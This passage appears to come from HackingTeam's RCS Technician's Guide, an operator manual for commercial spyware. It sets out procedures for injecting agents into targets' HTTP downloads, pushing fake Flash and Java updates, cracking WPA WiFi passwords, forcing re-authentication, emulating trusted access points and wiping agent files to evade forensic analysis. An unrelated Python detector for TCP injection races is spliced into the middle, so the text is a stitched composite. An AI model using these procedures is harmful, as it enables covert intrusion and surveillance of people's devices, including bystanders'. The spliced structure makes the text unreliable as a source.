4    Event area. STARTUP and SYNC events are enabled by default.
5    Action area. STARTUP and SYNC actions are enabled by default.
6    Modules area. Modules vary by desktop or mobile device.
7    RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For more information on the advanced configuration see "What you should know about advanced
configuration" on page 56.
Creating a simple activation sequence
To create a simple sequence, to collect evidence when an event occurs:
Step    Action
1    Creating an event:
• Click Add Event: the event selection and settings window opens.
• In Type, select the type of event and set options. See "Event list" on page 112.
• Click Save: the new event is added to the work area.
2    Creating an action:
• Click Add Action: the empty action is added to the work area.
3    Link the event to the action, then the action to the desired module:
• Click on the Start event connection point, then drag the arrow to the action.
• Click on the Start Modules action connection point, then drag the arrow to
the type of data to be acquired. See "Module list" on page 122.
4    Click Save: the configuration is ready to be compiled (if factory) or transmitted to the
device at the next synchronization (if agent).
Creating a complex activation sequence
To create a complex sequence, to start collecting evidence, run a sub-action and enable/disable
an event, when an event occurs:
Step    Action
1    Creating an event:
• Click Add Event: the event selection and settings window opens.
• In Type, select the type of event and set options. See "Event list" on page 112.
• Click Save: the new event is added to the work area.
2    Creating an action and setting sub-actions:
• Click Add Action: the empty action is added to the work area.
• Double-click on the action, add the sub-action in Subaction and set
options. See "List of sub-actions" on page 105.
3    Connecting the event to the action:
• Click on one of the Start, Repeat, End event connection points, then drag the
arrow to the action.
4    Connecting the action to the module:
• Click on the Start Modules or Stop Modules action connection points, then
drag the arrow to the module to be started or stopped. See "Module list" on
page 122.
Tip: drag multiple arrows if multiple modules have to be enabled.
5    For an action that requires an event to be enabled/disabled:
• Click on the Enable events or Disable events action connection points, then
drag the arrow to the events to be enabled/disabled.
6    Click Save: the configuration is ready to be compiled (if factory) or transmitted to the
device at the next synchronization (if agent).
Global agent data
Global agent data is described below:
Field    Description
Minimum disk free    Minimum free disk space on the device.
Maximum evidence size    Maximum space occupied by evidence on the target device, up to the next
synchronization; 1 GB by default. When this limit is reached, the agent stops recording and
waits for the next synchronization. If synchronization does not occur, no further evidence is
acquired.
Field    Description
Wipe    If enabled, it wipes the files generated by the agent. No trace of the agent will be
detected in case of forensic analysis.
NOTE: this method takes longer to complete than normal file deletion.
Remove driver    Remove the driver at uninstall.
No hide    Service call: only use when requested by HackingTeam support service.
Mask    Service call: only use when requested by HackingTeam support service.
The Network Injector
Presentation
Introduction
Network Injector allows you to tap the target's HTTP connections and inject an agent on the
device.
Content
This section includes the following topics:
What you should know about Network Injector and its rules
Managing the Network Injector
Injection rule data
Checking Network Injector status
What you should know about Appliance Control Center
Appliance Control Center
Appliance Control Center data
What you should know about Tactical Control Center
Tactical Control Center
Tactical Control Center data
What you should know about Network Injector and its rules
Introduction
Network Injector monitors all the HTTP connections and, following the injection rules, identifies
the target's connections and injects the agent into the connections, linking it to the resources the
target is downloading from the Internet.
Network Injector types
There are two Network Injector types:
• Appliance: network server for installation in an intra-switch segment at an Internet service
provider.
• Tactical: laptop for tactical installation on LAN or WiFi networks.
Both Network Injectors let you automatically identify the target devices and infect them according
to the set rules via their control software (Appliance Control Center or Tactical Control Center).
Tactical Network Injectors also allow for manual identification.
See "What you should know about Network Injector Appliance" and "What you should know about
Tactical Control Center".
Types of resources that can be infected
Resources that can be infected by RCS are any type of files.
NOTE: Network Injector is not able to monitor FTP or [...] connections.
How to create a rule
To create a rule:
1. define the way to identify the target's connections. For example, by matching the target's
IP or MAC address. Or let the Tactical Network Injector operator select the device.
2. define the way to infect the target. For example, by replacing a file the target is
downloading from the web or by infecting a website the target usually visits.
Automatic or manual identification rules
If information is already known on target devices, numerous rules can be created, adapting them
to the target's different habits, then enabling the most efficient rule or rules according to the
situations that arise during a certain time in the investigation.
If no information is known on target devices, use Tactical Network Injector, which allows operators
to observe the target, identify the device used and infect it in the field.
For this type of manual control specify TACTICAL in the User patterns field in the injection rule.
What happens when a rule is enabled/disabled
Enabling a rule means making it available to the Network Injector injection process. RCS routinely
communicates with Network Injector to send rules and acquire logs. The operator is in charge of
enabling this for Tactical Network Injector.
A rule that is not enabled is not applicable, meaning it cannot be sent to the Network Injector.
Starting the infection
After Network Injector receives the infection rules, it is ready to start an attack.
During the sniffing phase, it checks whether any of the devices in the network meets the
identification rules. If so, it sends the agent to the identified device and infects it.
Managing the Network Injector
To open Network Injectors: System section, Network Injector
Purpose
When the RCS is running, this function lets you create injection rules and send them to the
Network Injector.
NOTE: the function is only enabled if the user has Injector rules management
authorization.
What you can do
With this function you can:
• create an agent injection rule on a target
• send the rules to Network Injector
What the function looks like
This is what the page looks like:
[Figure: Network Injector page, with numbered areas described below]
Area    Description
RCS menu.
System menu.
Network Injector toolbar.
Network Injector list.
Injection rule toolbar.
NOTE: the functions are only enabled if the user has Injector rules
management authorization.
Descriptions are provided below:
Action    Description
Add a new rule.
Open the window with rule data.
Delete the selected rule.
Send rules to the selected Network Injector. Appliance automatically
updates at the next synchronization, provided an infection process is
running. With Tactical, the operator must select whether the rules should be
updated.
Area    Description
5    List of selected Network Injector rules.
En: select to enable the rules to be applied.
3    RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For a description of injection rule data see "Injection rule data" on the next page.
For further information on injection rules see "What you should know about Network Injector
and its rules" on page 66.
Adding a new injection rule
To add a new rule:
Step    Action
1    Select the Network Injector for the new rule: rule commands and table appear.
2    • Click Add New Rule: data entry fields appear.
• Enter the required data. If the rule is enabled, it can already be sent to the
Network Injector. See "Injection rule data" on the next page.
3    Click Save: the new rule appears in the main work area.
Send the rules to Network Injector
To send the rules to Network Injector:
Step    Action
1    Enable the rule to be sent to Network Injector by selecting the En control box in the
table.
2    Click Send rules: RCS receives the request to send the rules to the selected Network
Injector. The progress bar in the download area shows operation progress.
NOTE: Network Injector only receives the updated rules when it is synchronized
with the RCS server. See "Checking Network Injector status" on page 74.
Technician's Guide ver.1.5 RC3 9 20133 - pag. 69
Injection rule data
Data that define the available infection rules are described below:
Data Description
Enabled: If selected, the rule will be sent to the Network Injector. If not selected, the rule is saved but not sent.
Disable on sync: If selected, the rule is disabled after the first synchronization of the agent defined in the rule. If not selected, the Network Injector continues to apply the rule, even after the first synchronization.
Probability: Probability (in percent) of applying the rule after the first infected resource.
0%: after infecting the first resource, Network Injector will no longer apply this rule.
100%: after infecting the first resource, Network Injector will always apply this rule.
Tip: if a value over 50% is selected, we recommend you use the Disable on sync option.
Target: Name of the target to be infected.
Data Description
Ident: Target's HTTP connection identification method.
NOTE: Network Injector cannot monitor FTP or HTTPS connections.
Each method is described below:
Data Description
STATIC-IP: Static IP assigned to the target.
STATIC-RANGE: Range of IP addresses assigned to the target.
STATIC-MAC: Target's static MAC address, both Ethernet and WiFi.
DHCP: Target's network interface MAC address.
RADIUS-LOGIN: RADIUS user name. User-Name (RADIUS 802.11).
RADIUS caller ID: Calling-Station-Id (RADIUS 802.11).
RADIUS-SESSID: RADIUS session ID. Acct-Session-Id (RADIUS 802.11).
RADIUS-TECHKEY: RADIUS key. NAS-IP-Address: Acct-Session-Id (RADIUS 802.11).
STRING-CLIENT: Text string to be identified in the data traffic from the target.
STRING-SERVER: Text string to be identified in the data traffic to the target.
TACTICAL: The target is not automatically identified but can be identified by the operator on Tactical Network Injector. Only after the device is identified by the operator is the Ident field customized with the data received from the device.
Data Description
User pattern: Target's traffic identification method. The format depends on the type of Ident selected.
Method Format
DHCP, STATIC-IP, STATIC-MAC: Corresponding address, e.g. "195.162.21.2".
STATIC-RANGE: Address range, from the first to the last address, e.g. "195.162.21.2" to "195.162.21.5".
STRING-CLIENT, STRING-SERVER: Text string.
RADIUS caller ID: ID or part of the ID.
RADIUS-LOGIN: Name or part of the user name.
RADIUS-SESSID: ID or part of the ID.
RADIUS-TECHKEY: Key or part of the key.
TACTICAL: A value cannot be set. The correct value will be set by the field operator.
Data Description
Resource pattern: Identification method of the resource to be injected, applied to the Web resource URL. The format depends on the type of Action selected.
NOTE: leave empty if the selected action is INJECT-UPGRADE.
Action type / Resource Pattern Content
INJECT-EXE: URL of the executable file to be infected. Use wildcards to increase the number of matching URLs. Examples of possible formats:
NOTE: when a full path is specified, be careful of any mirrors used by websites to download files.
Tip: enter *.exe* to infect all executable files, regardless of the URL.
IMPORTANT: for example, if *exe* is entered without the file extension separator, all the pages that accidentally contain the letters "exe" will be injected.
INJECT-HTML-FILE: URL of the website to be infected. Examples of possible formats:
NOTE: the site address must include the final "/" character if an HTM or dynamic page is not specified.
NOTE: a redirect page cannot be infected. Check the browser for the correct site path before using it in a rule.
INJECT-HTML-FLASH: Preset for YouTube and read-only by the user.
INJECT-UPGRADE: Not used.
REPLACE: URL of a resource to be replaced.
Data Description
Action: Infection method that will be applied to the resource indicated in Resource pattern:
Method Function
INJECT-EXE: Infects the downloaded EXE file in real time. The agent is installed when the target runs the EXE file.
INJECT-HTML-FILE: Lets you add the HTML code provided in the file to the visited web page. Please contact HackingTeam technicians for further details.
INJECT-HTML-FLASH: Blocks videos on YouTube and requires the user to install a fake Flash update to view them. The agent is installed when the target installs the update.
INJECT-UPGRADE: Notifies the Java Runtime Environment on the device that an update is available. The agent is installed when the target installs the update. Does not refer to Resource pattern.
REPLACE: Replaces the resource set in the Resource pattern with the supplied file.
Tip: this type of action is very effective when used in combination with Exploit generated documents.
Agent: For all actions except REPLACE. Agent to be injected into the selected Web resource.
File: For REPLACE Action only. File to be replaced with the one indicated in Resource pattern.
Checking Network Injector status
Introduction
Network Injector synchronizes with the RCS server to download updated control software versions, identification and injection rules and send their logs.
Network Injector status can be monitored from RCS Console. Specifically:
- in the Monitor section: to identify when Network Injector is synchronized and thus available for data exchanges.
Identifying when Network Injector is synchronized
The procedure is described below:
Step Action
1 In the Monitor section, select the Network Injector object row to be analyzed. Check the Status column: if flagged green, the Network Injector is synchronized.
This situation occurs when on Control Center software (Appliance or Tactical):
- Config was clicked, the operator manually queued for new rules or updates;
- Start was clicked or an infection is in progress.
IMPORTANT: applied rules and updates can only be received from RCS when Network Injector is synchronized.
What you should know about Appliance Control Center
Introduction
Appliance Control Center is an application installed on Network Injector Appliance.
Synchronization with RCS server
Appliance Control Center synchronizes with RCS to receive the updated infection rules, to check whether a new version of Appliance Control Center is available and to send logs.
Synchronization can occur in two ways:
- manually, at least the first time, to receive injection rules, using the Appliance Control Center Network Injector function;
- automatically with an infection in progress.
During synchronization RCS communicates with Network Injector Appliance at set intervals of time (about 30 sec.).
Injection interface IP address
For infection to be successful, the injection interface must have a public address, otherwise the target will never be able to see it.
In an initial phase you can use the preset address on the interface with Appliance Control Center (with Public IP "auto"), wait for a message that indicates that the address is private and, in that case, set a public address to re-route the private address (Public IP field).
Sniffing, on the other hand, can be run via the network interface with a private IP address.
Appliance Control Center
Purpose
Appliance Control Center lets devices be infected:
- automatically, by applying the identification rules based on known device information (IP address).
What you can do
With Appliance Control Center you can:
- Enable synchronization with RCS server to receive updated identification and injection rules and send logs.
- Update Appliance Control Center, essentially to update agents on devices.
- Automatically identify connected devices and infect them through identification and injection rules.
Password request
When Appliance Control Center opens, a password must be entered, the same as the notebook on which it's running.
What the function looks like
This is what the page looks like:
[Screenshot: Appliance Control Center, Network Injector tab, with the Config, Rules and Start buttons, the Sniffing interface and Public IP fields and the Automatic startup option]
Area Description
1 Single application access tabs. Descriptions are provided below:
Function Description
Network Injector: It manages target device sniffing and infection, RCS rule synchronization and Appliance device updates.
Log System: Lists logs in real time.
2 Area with the buttons to reload the device list, start network connections, enable synchronization, enable automatic restart after boot and enable Network Appliance update.
To learn more
To learn more about Appliance Control Center see "What you should know about Appliance Control Center" on page 75.
For a description of Appliance Control Center data see "Appliance Control Center data" on page 79.
Enabling synchronization with RCS server to receive new rules
Following is the procedure on how to enable synchronization with RCS server to receive updated rules:
NOTE: if an infection is in progress, Network Injector is already synchronized with RCS server and thus rules are automatically uploaded; skip to step 4. See "Checking Network Injector status" on page 74.
Steps Result
1. In the Network Injector tab, click Config: synchronization is enabled.
2. During synchronization RCS queries Network Injector every 30 seconds. Sent injection rules will be received by Network Injector. See "Managing the Network Injector".
[Screenshot: Appliance Control Center, Network Injector tab, during synchronization]
IMPORTANT: routinely enable synchronization to guarantee constant operating center updates and infection success.
3. To stop synchronization click Stop.
4. To view the rules received from RCS Console click Rules: all rules for Network Injector appear.
[Screenshot: Network rules list, showing each rule's Ident, User pattern, Probability, Action and Resource pattern columns]
IMPORTANT: make sure rule synchronization is successful after requesting updated rules from RCS Console.
Infecting targets using automatic identification
To start automatic identification and infection:
Steps Result
1. In the Network Injector tab, select the network interface for injection in the Network Interface list box.
2. In the Sniffing interface list box, select a different network interface to be used for sniffing or select the same interface used for injection.
Tip: use two different interfaces to guarantee better device identification.
NOTE: Endace interfaces, meaning sniffing interfaces, appear in Sniffing Interface.
3. Click on Automatic Startup to automatically restart the infection without any human intervention even after Appliance Network Injector reboot or shutdown.
4. Click Start.
IMPORTANT: Appliance Control Center lets you set up, start an infection and close Appliance Control Center leaving the infection running. The next time it is opened with the infection running, the Stop button will appear instead of the Start button. This lets you re-configure and start a new infection.
5. To stop infection, click Stop, or close the window to leave the infection running.
Viewing infection details
To view recorded data, select the Log System tab.
[Screenshot: Appliance Control Center, Network Injector tab, with an infection running]
Appliance Control Center data
Network Injector data tab
Data is described below:
Data Description
Network interface: List of connected network interfaces. Select the injection interface connected to the network on which the device to be attacked is connected.
Sniffing interface: Like Network Interface or another network interface to only be used for sniffing.
NOTE: If the system includes an Endace DAG card for Gigabit connections, the card will be detected and displayed in this list.
Public IP: Lets you specify a public IP address to be mapped on the injection interface private IP address. If "auto" is entered, the system uses the default IP address on the injection interface and sends a message indicating that it is a private IP address.
Automatic Startup: It automatically restarts the infection without any human intervention even following Appliance Network Injector reboot or shutdown.
IMPORTANT: If this option is not selected, infection will not be automatically started.
What you should know about Tactical Control Center
Introduction
Tactical Control Center is an application installed on a notebook, called Tactical Network Injector. It can connect to a protected WiFi network, infect devices thanks to RCS identification and injection rules or infect manually identified devices.
The identification and infection rules are the same as those used for Network Injector Appliance, with the sole difference that Tactical Network Injector provides an additional "manual" identification rule. Thus the operator identifies the device to be infected and applies the injection rules to that device.
Tactical Control Center operations
With Tactical Control Center you can:
- Enable synchronization with RCS to receive updated identification and injection rules and send logs.
- Update Tactical Control Center, essentially to update agents on devices.
- Automatically identify devices in a wired or WiFi network and infect them according to the RCS identification and injection rules.
- Manually identify devices in a wired or WiFi network and infect them according to the RCS injection rules. The operator is in charge of identification.
- Connect to a protected WiFi network to obtain its password.
- Emulate a WiFi network Access Point normally used by the target.
NOTE: the injection network can be external or an open WiFi network simulated by the Tactical Control Center.
Synchronization with RCS server
Tactical Control Center synchronizes with RCS to receive the updated infection rules, to check whether a new version of Tactical Control Center is available and to send logs.
Synchronization can occur in two ways:
- manually, the first time, to receive injection rules;
- automatically with an infection in progress.
Updating infection rules
If traffic generated by the target cannot be infected with the current rules, request operator assistance on RCS Console to generate new rules and update Network Injector. Receive the new rules the next time Tactical Control Center is synchronized to view them.
Using network interfaces
Two different network interfaces are available during an attack, one for sniffing and one for injection. Using two separate interfaces is indicated to guarantee continuity, especially for sniffing.
Only the sniffing interface is used when emulating the Access Point and acquiring network passwords.
Sniffing interfaces can be internal or external: external interfaces are indicated for sniffing because transmission speed is higher.
Infection via automatic identification
The steps needed to infect devices automatically identified by RCS rules are described below. The attack can be run on wired or WiFi networks:
Phase Description Where
1 Prepare identification and injection rules for known targets to be attacked. Send the rules to Tactical Network Injector. Where: RCS Console, System, Network Injector.
2 Enable synchronization with RCS to receive updated rules. Where: Tactical Network Injector, Network Injector.
3 If target devices are connected to a protected WiFi network, acquire the password. Where: Tactical Network Injector, Wireless Intruder.
4 | The system sniffs traffic, identifies target devices thanks to identification rules and infects them thanks to injection rules. | Tactical Network Injector, Network Injector
5 | If necessary, force re-authentication on devices not identified by the rules. |
Infection via manual identification
Following are the steps required to infect manually identified devices. The operator's goal is to identify target devices.
The attack can be run on wired or WiFi networks:
Phase | Description | Where
1 | Prepare identification rules that include manual identification and injection rules for all the target devices to be attacked. Send the rules to Tactical Network Injector. | RCS Console, System, Network Injector
2 | Enable synchronization with RCS to receive updated rules. | Tactical Network Injector, Network Injector
3 | If target devices are connected to a protected WiFi network, acquire the password. | Tactical Network Injector, Wireless Intruder
4 | If target devices can connect to an open WiFi network, try emulating an Access Point known by the target. | Tactical Network Injector, Fake Access Point
5 | The system proposes all devices connected to the selected network interface. Use filters to search for target devices or check the web chronology for each device. | Tactical Network Injector, Network Injector
6 | Select devices and infect them. |
Enable synchronization with RCS
Tactical Control Center receives the updated software and identification and injection rules from RCS and sends logs.
In this communication, RCS will attempt to communicate with Tactical Network Injector at set intervals (about 30 sec.). In Tactical Control Center, decide when to enable synchronization using the Network Injector function.
Protected WiFi network password acquisition
If the target device is connected to a protected WiFi network, the access password must be obtained to login.
The Wireless Intruder function lets you connect to a WiFi network and crack the password. For WPA and WPA 2 protected networks, an additional dictionary can be loaded in addition to the standard dictionary. The password is displayed and the operator can copy it to use it with the sniffing and injection function (Network Injector function).
Infection via automatic identification
This work mode is suited for situations when some target device information is known (e.g. IP address).
In this case, RCS injection rules include all the data required to automatically identify target devices.
Starting automatic identification using the Network Injector function gradually displays target devices that are immediately infected by the injection rules.
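The sniff-and-inject mechanism described here leaves a trace a network defender can look for: the forged response and the genuine one share the same TCP flow and sequence number but carry different data, and usually arrive with different IP TTLs. The following Python detector is an added example, not part of the guide or of the RCS product; the addresses, ports, TTLs and HTTP payloads in it are constructed sample data, and the `Segment` record stands in for whatever a capture library would provide.

```python
"""Flag TCP injection races in a list of captured segments.

Added defensive example, not part of the guide. An in-path injector that
sniffs a client's request and answers before the real server produces a
forged segment with the same (flow, seq) as the genuine one that follows;
the client keeps the first copy and drops the later one as a duplicate, so
both are visible on the wire. Genuine retransmissions repeat the same data,
so only *conflicting* payloads for one (flow, seq) are reported. All sample
values below (addresses, ports, TTLs, HTTP bodies) are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    seq: int        # TCP sequence number of the first payload byte
    ttl: int        # IP TTL as seen at the capture point
    payload: bytes


FlowKey = Tuple[str, int, str, int, int]


def same_data(a: bytes, b: bytes) -> bool:
    """Retransmissions may be re-segmented; equal bytes over the overlap is benign."""
    n = min(len(a), len(b))
    return a[:n] == b[:n]


def find_injection_candidates(segments: List[Segment]) -> List[dict]:
    """Return one finding per (flow, seq) whose payloads disagree.

    The first segment seen is the one the client would have accepted, so it is
    reported as 'accepted'; later conflicting copies are 'conflicting'. A TTL
    mismatch between them strengthens the finding, because an injector sits
    at a different hop count from the real server.
    """
    groups: Dict[FlowKey, List[Segment]] = defaultdict(list)
    for s in segments:
        if s.payload:  # pure ACKs cannot carry a forged response
            groups[(s.src, s.sport, s.dst, s.dport, s.seq)].append(s)

    findings = []
    for (src, sport, dst, dport, seq), segs in groups.items():
        first = segs[0]
        conflicting = [s for s in segs[1:] if not same_data(first.payload, s.payload)]
        if not conflicting:
            continue  # identical copies: ordinary retransmission
        findings.append({
            "flow": f"{src}:{sport} -> {dst}:{dport}",
            "seq": seq,
            "accepted": first.payload[:32],
            "accepted_ttl": first.ttl,
            "conflicting": [(s.ttl, s.payload[:32]) for s in conflicting],
            "ttl_mismatch": any(s.ttl != first.ttl for s in conflicting),
        })
    return findings


# Constructed capture: client 192.0.2.10 requested a page from 198.51.100.7.
# The injector, on the client's own network, answers first with a fresh TTL;
# the genuine reply arrives later with the same seq and a TTL decremented by
# the real path. Port 51520 carries a benign re-segmented retransmission.
SAMPLE_CAPTURE = [
    Segment("198.51.100.7", 80, "192.0.2.10", 51514, 1000, 64,
            b"HTTP/1.1 302 Found\r\nLocation: http://update.example.invalid/\r\n\r\n"),
    Segment("198.51.100.7", 80, "192.0.2.10", 51514, 1000, 52,
            b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>"),
    Segment("198.51.100.7", 80, "192.0.2.10", 51520, 5000, 52,
            b"HTTP/1.1 200 OK\r\n"),
    Segment("198.51.100.7", 80, "192.0.2.10", 51520, 5000, 52,
            b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nok"),
]


if __name__ == "__main__":
    for f in find_injection_candidates(SAMPLE_CAPTURE):
        print(f"{f['flow']} seq={f['seq']} ttl_mismatch={f['ttl_mismatch']}")
        print("  accepted   :", f["accepted_ttl"], f["accepted"])
        for ttl, data in f["conflicting"]:
            print("  conflicting:", ttl, data)
```

On a real capture the same grouping applies to segments decoded by any packet library; the only requirement is that both copies of the raced segment are observed, which is the case for a tap or span port on the client's side of the injector.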
Forcing unknown device authentication
You may not be able to connect to some devices in a password protected WiFi network. These types of devices appear in the list as unknown.
In this case, their authentication can be forced: the device will disconnect from the network, reconnect and be identified.
Infection via manual identification
Manual identification can be indicated in RCS identification rules. This procedure is frequently run when there is no information on the device to be infected and it must be identified in the field.
In this case, a series of functions to select devices connected to the network is available to the operator:
- filters can be set on tapped traffic: only devices that meet these criteria are infected;
- the chronology of each device can be checked to decide which device should be infected.
Once target devices are identified, simply select them to start infection; the identification rules are "customized" with the device data to allow injection rules to be applied.
NOTE: devices that were already infected via automatic identification can be manually infected.
Setting filters on tapped traffic
When manually identifying targets, some targets may not be identified among those connected to the network. In this case, use the Network Injector function to set filters on tapped traffic.
Tactical Control Center provides two types of filters:
- regular expressions
- Network BPF (Berkeley Packet Filter)
Filter with regular expression
Regular expressions are broad filters. For example, if our target is visiting a Facebook page and talking about windsurf, simply enter "facebook" or "windsurf".
Tactical Network Injector taps all traffic data and searches for the entered words.
For further information on all admitted regular expressions, see [reference unreadable in the scan].
BPF (Berkeley Packet Filter) network filter
This is used to more accurately filter devices using BPF syntax (Berkeley Packet Filter). This syntax includes key words accompanied by qualifiers:
- type qualifiers (host, net, port) indicate the type of object searched for
- direction qualifiers (src, dst) indicate the direction of the data searched for
- protocol qualifiers (ether, wlan, ip) indicate the protocol used by the object searched for
For example, if our target is visiting a Facebook page, enter "host facebook.com".
For further details on syntax qualifiers, see [reference unreadable in the scan].
Identifying a target by analyzing the chronology
Another way to filter and shorten the list of possible targets is to analyze device web traffic to identify it as the target.
Emulating an Access Point known by the target
In certain scenarios target devices must be attracted to tap their data, identify and infect them. To do this, Tactical Network Injector emulates an Access Point already known to the target device.
This way, if the device is enabled to automatically connect to available WiFi networks, it automatically connects to the Access Point emulated by Tactical Network Injector as soon as it enters the WiFi area.
Tactical Control Center
Purpose
Tactical Control Center lets you identify and infect devices:
- automatically, by applying the identification rules based on known device information (e.g. IP address);
- manually, through a series of attempts to identify the target device and infect it.
The identification method should be agreed with the operating center.
What you can do
With Tactical Control Center you can:
- Enable synchronization with RCS to receive updated identification and injection rules and send logs.
- Update Tactical Control Center.
- Connect to a protected WiFi network to obtain its password.
- Apply device identification rules and infect them.
- Force new authentication on devices not identified upon the first attempt.
- Select devices based on filters or chronological information.
- Emulate an Access Point to attract target devices.
Password request
When Tactical Control Center opens, a password must be entered, the same as the notebook on which it's running.
What the function looks like
This is what the page looks like:
[Screenshot: Tactical Control Center main page, showing the network interface selectors with signal level and link test, the application tabs and the device list; not reproducible from the scan]
Area | Description
1 | Single application access tabs. Descriptions are provided below:
Function | Description
Network Injector | Manages target device sniffing and infection, RCS rules, updates Tactical devices and displays current Tactical Network Injector rules.
Wireless Intruder | Enters a protected WiFi network by identifying the password.
Fake Access Point | Emulates an Access Point.
Log | Lists logs in real time.
System | [description missing in the scan]
2 | Area with buttons to reload the device list, start network connections and enable synchronization.
3 | Filters to filter internet traffic on devices.
4 | Device list area.
To learn more
For a description of Tactical Control Center data see "Tactical Control Center data" on page [unreadable].
To learn more about Tactical Control Center see "What you should know about Tactical Control Center" on page [unreadable].
Enabling synchronization with RCS server to receive new rules
Following is the procedure on how to enable synchronization with RCS to receive updated rules:
NOTE: if an infection is in progress, Network Injector is already synchronized with RCS server and thus rules are automatically uploaded; skip to step 4. See "Checking Network Injector status" on page [unreadable].
Steps | Result
1. In the Network Injector tab, click Config: synchronization is enabled. | [Screenshot: Network Injector tab with the Config, Rules, Start and Stop buttons]
2. During synchronization RCS queries Network Injector every 30 seconds. Sent injection rules will be received at the end of the synchronization. [Rules are] received if sent from RCS Console. See "Managing the Network Injector" on page [unreadable]. IMPORTANT: routinely enable synchronization to guarantee constant operating center updates and infection success. |
3. To stop synchronization click Stop. |
4. To view the rules received from RCS Console click Rules: all rules for Network Injector appear. Make sure rule synchronization is successful after requesting updates from RCS Console. | [Screenshot: list of rules received for Tactical Network Injector (rule type, target, probability)]
Running a network test
The network test procedure for sniffing and/or injection is provided below:
Steps | Result
1. In the Network Injector or Wireless Intruder tab, select the network interface. |
2. Click Link test: a window appears where test results are displayed. | [Screenshot: "Link test to wireless network" window showing Interface, Channel and ESSID, the Link test Result, the injection test and connectivity test to the wireless network, and a Repeat link test button]
3. If the test failed, move to a better position where the signal is stronger and repeat the test. IMPORTANT: the attack will not be successful if the test fails. |
Acquiring a protected WiFi network password
How to acquire a protected WiFi network password is described below:
Steps | Result
1. In the Wireless Intruder tab, select the WiFi network interface in Wireless interface. | [Screenshot: Tactical Control Center, Wireless Intruder tab]
2. In Network, select the network whose password is to be found. NOTE: manage network interface connections/disconnections from the operating system and click Refresh. |
3. In Attack type select the type of attack. |
4. If necessary, click Wordlist to load an additional dictionary to attack WPA or WPA 2 protected networks. IMPORTANT: the additional dictionary must be loaded at each attack. |
5. Click Start: the system launches various attacks to find the access password. | [Screenshot: Wireless Intruder tab with Network, Attack type and Wordlist fields and the "Start an automatic attack" button]
6. Click Stop to stop the attack. |
7. If attacks are successful, the password appears over the Status indicator. | [Screenshot: Wireless Intruder tab with the recovered password shown in the Status area]
8. Using the operating system Network Manager use the password to connect to the WiFi network. The password is saved by the system and no longer needs to be entered. |
9. Open the Network Injector section to start identification and infection. |
Infecting targets using automatic identification
To start automatic identification and infection:
Steps | Result
1. In the Network Injector tab, select the network interface for injection in the Network Interface list box. | [Screenshot: Tactical Control Center, Network Injector tab with the Network interface and Sniffing interface list boxes, signal indicators and Refresh button]
2. In the Sniffing interface list box, select a different network interface to be used for sniffing or select the same interface used for injection. NOTE: manage network interface connections/disconnections from the operating system and click Refresh. Use two different interfaces to guarantee better device identification. |
3. Check signal power and, if necessary, run the network test. NOTE: signal power must be at least [value unreadable in the scan]. A single value will be returned if the same network interface is used for injection and sniffing. | [Screenshot: link test results with the Config, Rules, Start and Stop buttons]
4. Click Start. |
5. The network sniffing process starts and all devices identified as targets appear. The Status column displays identification status. WARNING: verify identification status. See "Tactical Control Center data" on page [unreadable]. | [Screenshot: Tactical Control Center device list with Status, IP address, MAC address, vendor and identification columns]
6. Target devices begin to be infected. Infection start is recorded in the log. NOTE: non-target devices don't appear in the list and are thus excluded from automatic infection. |
To stop infection, click Stop.
Forcing unknown device authentication
To force an unknown device authentication:
Steps | Result
1. In the Network Injector tab, select unknown devices from the list. | [Screenshot: Tactical Control Center, Network Injector tab; device list with Status, IP address, MAC address and vendor columns; Reauth selected and Reauth All buttons]
2. Click Reauth selected: devices are forced to re-authenticate. Tip: in certain cases, all devices must be authenticated. To do this, click Reauth All. |
3. If re-authentication is successful, automatic identification is started: device status will be [status icon] and can be infected from now on. |
Infecting targets using manual identification
To manually infect network devices:
Steps | Result
1. In Network Injector, select one or more devices to be infected from the device list and identify them using the displayed data. Tip: if there are a lot of devices in the list, filter the selection. See "Setting filters on tapped traffic" below. |
2. Click Infect selected: all injection rules are "customized" with the device data and applied. Device attacks will be displayed in the logs. IMPORTANT: this operation requires a special rule in RCS. Tip: in certain cases, all connected devices must be infected, even non-target devices or those not yet connected. To do this, click Infect All. Result: if the infection was started, device status is [status icon]. |
Setting filters on tapped traffic
To select target devices using data traffic filters:
Steps | Result
1. In the Network Injector tab, click Network filters. |
2. For a wider search, enter a regular expression in the Regular expression text box. |
3. Or, to refine the search, enter a BPF expression in the BPF Network Filter text box. Result: the system only displays filtered devices in the list. |
4. Manually infect devices as described in the procedure; see "Infecting targets using manual identification" on page 91. | [Screenshot: Network filters panel with Regular expression set to "facebook", the BPF Network Filter field, the Apply button and the filtered device list (Status, IP address, hostname, OS, browser, web history)]
Identify the target by analyzing web chronology
To identify a target:
1. In the Network Injector tab, double-click the device to be checked: a window opens with the chronology of the websites visited by the browser.
[Figure: Web history window listing the resources recently requested by the device, e.g. google.com, gstatic.com, facebook.com and youtube.com hosts.]
2. If the device is the target device, close the chronology and run the procedure "Infecting targets using manual identification" above.
Cleaning erroneously infected devices
To remove an infection from a device, the agent must be closed on the RCS Console.
Emulating an Access Point known by the target
IMPORTANT: before emulating an Access Point, stop any current attacks in the Network Injector tab.
To transform Tactical Network Injector into an Access Point known by targets:
1. In the Fake Access Point tab, select the network interface to listen to in the Wireless interface box.
[Figure: Tactical Control Center, Fake Access Point tab, with the Wireless interface selection and the Start button.]
2. Select the type of Access Point emulation.
3. Click Start: Tactical Network Injector recovers the names of the networks the devices usually connect to and displays them in the Network Injector tab.
4. At the same time, it establishes communications with the single devices, emulating the access point for each network.
5. In Network Injector, select the same network interface displayed as the access point in the Network interface list box.
6. Click Start: connected devices are displayed.
7. Manually infect the devices as described in the procedure "Infecting targets using manual identification" above.
Turn off Tactical Network Injector
No special procedure is required: shut the computer down normally.
Viewing infection details
To view recorded data, select the Log System tab.
Tactical Control Center data
Network Injector data tab
Data is described below:
Network interface: List of connected network interfaces. Select the injection interface connected to the network on which the device to be attacked is connected. When simulating an Access Point, the interface used in the Fake Access Point section also appears.
Sniffing interface: Same as Network interface, or another network interface to be used only for sniffing.
Regular expression: Expression used to filter the devices connected to the network. It is applied to all data of any kind transmitted and received by the device over the network. See "What you should know about Tactical Control Center".
